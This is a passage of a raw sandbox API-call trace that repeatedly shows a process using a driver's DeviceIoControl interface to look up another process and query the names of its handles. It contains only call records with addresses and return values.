KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.095] PsReleaseProcessExitSynchronization () returned 0x2 [0144.095] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.095] ObQueryNameString (in: Object=0xfffffa8003873600, ObjectNameInfo=0xfffffa8002fa5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa5044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.095] ObfDereferenceObject (Object=0xfffffa8003873600) returned 0x2 [0144.095] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.095] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.095] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.095] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0144.095] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.095] PsAcquireProcessExitSynchronization () returned 0x0 [0144.096] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.096] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038734b0, HandleInformation=0x0) returned 0x0 [0144.096] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.096] PsReleaseProcessExitSynchronization () returned 0x2 [0144.096] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.096] ObQueryNameString (in: Object=0xfffffa80038734b0, ObjectNameInfo=0xfffffa80030277c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030277c4, ReturnLength=0xfffff88005163550) returned 0x0 [0144.096] ObfDereferenceObject (Object=0xfffffa80038734b0) returned 0x2 [0144.096] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.096] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.096] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.096] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0144.096] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.096] PsAcquireProcessExitSynchronization () returned 0x0 [0144.096] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.096] ObReferenceObjectByHandle (in: Handle=0x51c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003879770, HandleInformation=0x0) returned 0x0 [0144.096] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.096] PsReleaseProcessExitSynchronization () returned 0x2 [0144.096] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.096] ObQueryNameString (in: Object=0xfffffa8003879770, ObjectNameInfo=0xfffffa8002fa7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa7044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.097] ObfDereferenceObject (Object=0xfffffa8003879770) returned 0x2 [0144.097] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.097] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.097] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.097] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0144.097] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.097] PsAcquireProcessExitSynchronization () returned 0x0 [0144.097] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.097] ObReferenceObjectByHandle (in: Handle=0x524, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003879620, HandleInformation=0x0) returned 0x0 [0144.097] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.097] PsReleaseProcessExitSynchronization () returned 0x2 [0144.097] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.097] ObQueryNameString (in: Object=0xfffffa8003879620, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.097] ObfDereferenceObject (Object=0xfffffa8003879620) returned 0x2 [0144.097] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.097] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.097] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.098] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0144.098] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.098] PsAcquireProcessExitSynchronization () returned 0x0 [0144.098] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.098] ObReferenceObjectByHandle (in: Handle=0x52c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e6f2c0, HandleInformation=0x0) returned 0x0 [0144.098] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.098] PsReleaseProcessExitSynchronization () returned 0x2 [0144.098] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.098] ObQueryNameString (in: Object=0xfffffa8002e6f2c0, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.098] ObfDereferenceObject (Object=0xfffffa8002e6f2c0) returned 0x2 [0144.098] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.098] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.098] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.098] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0144.098] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.098] PsAcquireProcessExitSynchronization () returned 0x0 [0144.098] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.099] ObReferenceObjectByHandle (in: Handle=0x534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034aa680, HandleInformation=0x0) returned 0x0 [0144.099] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.099] PsReleaseProcessExitSynchronization () returned 0x2 [0144.099] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.099] ObQueryNameString (in: Object=0xfffffa80034aa680, ObjectNameInfo=0xfffffa8002f9d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9d044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.099] ObfDereferenceObject (Object=0xfffffa80034aa680) returned 0x2 [0144.099] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.099] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.099] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.099] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0144.099] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.099] PsAcquireProcessExitSynchronization () returned 0x0 [0144.099] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.099] ObReferenceObjectByHandle (in: Handle=0x53c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800383e070, HandleInformation=0x0) returned 0x0 [0144.099] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.099] PsReleaseProcessExitSynchronization () returned 0x2 [0144.100] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.100] ObQueryNameString (in: Object=0xfffffa800383e070, ObjectNameInfo=0xfffffa8002f9e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9e044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.100] ObfDereferenceObject (Object=0xfffffa800383e070) returned 0x2 [0144.100] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.100] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.100] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.100] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0144.100] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.100] PsAcquireProcessExitSynchronization () returned 0x0 [0144.100] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.100] ObReferenceObjectByHandle (in: Handle=0x554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a49220, HandleInformation=0x0) returned 0x0 [0144.100] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.100] PsReleaseProcessExitSynchronization () returned 0x2 [0144.100] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.100] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.100] ObfDereferenceObject (Object=0xfffffa8003a49220) returned 0x1 [0144.100] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.100] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.100] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.101] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0144.101] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.101] PsAcquireProcessExitSynchronization () returned 0x0 [0144.101] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.101] ObReferenceObjectByHandle (in: Handle=0x56c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa3cb0, HandleInformation=0x0) returned 0x0 [0144.101] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.101] PsReleaseProcessExitSynchronization () returned 0x2 [0144.101] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.101] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd6044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.101] ObfDereferenceObject (Object=0xfffffa8001fa3cb0) returned 0x1 [0144.101] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.101] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.101] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.101] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0144.101] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.101] PsAcquireProcessExitSynchronization () returned 0x0 [0144.101] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.101] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017b7960, HandleInformation=0x0) returned 0x0 [0144.102] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.102] PsReleaseProcessExitSynchronization () returned 0x2 [0144.102] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.102] ObQueryNameString (in: Object=0xfffff8a0017b7960, ObjectNameInfo=0xfffffa8002fd8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd8044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.102] ObfDereferenceObject (Object=0xfffff8a0017b7960) returned 0x1 [0144.102] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.102] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.102] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.102] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0144.102] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.102] PsAcquireProcessExitSynchronization () returned 0x0 [0144.102] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.102] ObReferenceObjectByHandle (in: Handle=0x574, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa42b0, HandleInformation=0x0) returned 0x0 [0144.102] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.102] PsReleaseProcessExitSynchronization () returned 0x2 [0144.102] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.102] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd9044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.102] ObfDereferenceObject (Object=0xfffffa8001fa42b0) returned 0x1 [0144.102] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.103] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.103] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.103] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0144.103] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.103] PsAcquireProcessExitSynchronization () returned 0x0 [0144.103] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.103] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003993f20, HandleInformation=0x0) returned 0x0 [0144.103] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.103] PsReleaseProcessExitSynchronization () returned 0x2 [0144.103] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.103] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.103] ObfDereferenceObject (Object=0xfffffa8003993f20) returned 0x1 [0144.103] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.103] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.103] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.103] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0144.104] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.104] PsAcquireProcessExitSynchronization () returned 0x0 [0144.104] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.104] ObReferenceObjectByHandle (in: Handle=0x58c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003993dd0, HandleInformation=0x0) returned 0x0 [0144.104] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.104] PsReleaseProcessExitSynchronization () returned 0x2 [0144.104] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.104] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.104] ObfDereferenceObject (Object=0xfffffa8003993dd0) returned 0x1 [0144.104] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.104] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.104] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.104] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0144.104] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.104] PsAcquireProcessExitSynchronization () returned 0x0 [0144.104] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.105] ObReferenceObjectByHandle (in: Handle=0x594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003abd4d0, HandleInformation=0x0) returned 0x0 [0144.105] ObfDereferenceObject (Object=0xfffffa8003abd4d0) returned 0x1 [0144.105] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.105] PsReleaseProcessExitSynchronization () returned 0x2 [0144.105] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.105] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.105] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.105] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.105] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0144.105] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.105] PsAcquireProcessExitSynchronization () returned 0x0 [0144.105] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.105] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003993c80, HandleInformation=0x0) returned 0x0 [0144.105] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.105] PsReleaseProcessExitSynchronization () returned 0x2 [0144.105] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.105] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdd044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdd044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.105] ObfDereferenceObject (Object=0xfffffa8003993c80) returned 0x1 [0144.106] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.106] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.106] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.106] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0144.106] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.106] PsAcquireProcessExitSynchronization () returned 0x0 [0144.106] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.106] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017bb060, HandleInformation=0x0) returned 0x0 [0144.106] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.106] PsReleaseProcessExitSynchronization () returned 0x2 [0144.106] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.106] ObQueryNameString (in: Object=0xfffff8a0017bb060, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0144.106] ObfDereferenceObject (Object=0xfffff8a0017bb060) returned 0x1 [0144.106] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.106] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.106] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.106] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, 